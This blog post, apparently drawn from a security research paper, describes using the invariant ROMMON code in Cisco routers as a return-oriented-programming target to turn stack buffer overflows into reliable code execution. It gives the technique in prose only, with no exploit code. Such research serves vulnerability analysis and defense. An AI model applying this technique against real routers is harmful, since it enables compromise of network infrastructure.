To overcome the problem of high uncertainty in memory layout, a memory section is required that allows execution of its contents as code and preferably already contains code at a stable location.
Cisco routers use a piece of code called ROMMON as the initially available code to execute after the CPU has been reset. ROMMON is screened into memory at the initial reset vector and serves as bootstrapping code for IOS. The ROMMON also contains functionality for disaster recovery (allowing to load a new image when the available one is broken or corrupted) as well as some basic setup functions.
On the Cisco platforms reviewed by the author, ROMMON is placed the uppermost memory regions after the CPU's virtual addressing and address translation has been initialized to match the IOS image's memory map. Therefore, its location is known and invariant.
The factor decisive for using ROMMON as return point is the relatively small number of versions published for each router platform. Taking the 2600 access router platform as an example, there are 8 different versions of ROMMON known to the author. With a few exceptions due to hardware support added into later ROMMON versions, deployed infrastructure equipment rarely receives ROMMON upgrades. Therefore, the large majority of the routers runs the ROMMON version that was current when the equipment was manufactured. Since such equipment is usually ordered in bulk when new infrastructure is installed, the versions will neither differ nor will later versions be very common, because the initial version will be sold the most.
Applying Return Oriented Programming to the code found in ROMMON, it has been shown7 that 32 Bit arbitrary memory writes to the memory area that contains the exception handlers can be used on PowerPC and MIPS based Cisco routers to gain reliable code execution with stack based buffer overflows.
The method employs returns into function epilogues that perform a memory write to a register that was controlled by the attacker already, with the contents of another register under the attacker's control. On PowerPC, these are usually registers that, by the PowerPC ABI, should be saved across function boundaries (i.e. R13 to R31).
Beneficial for the attacker is the fact that ROMMON also contains code used to disable the instruction and data cache of the CPU, allowing to write data and directly afterwards execute it as code without cache consistency issues.
0 comments:
Post a Comment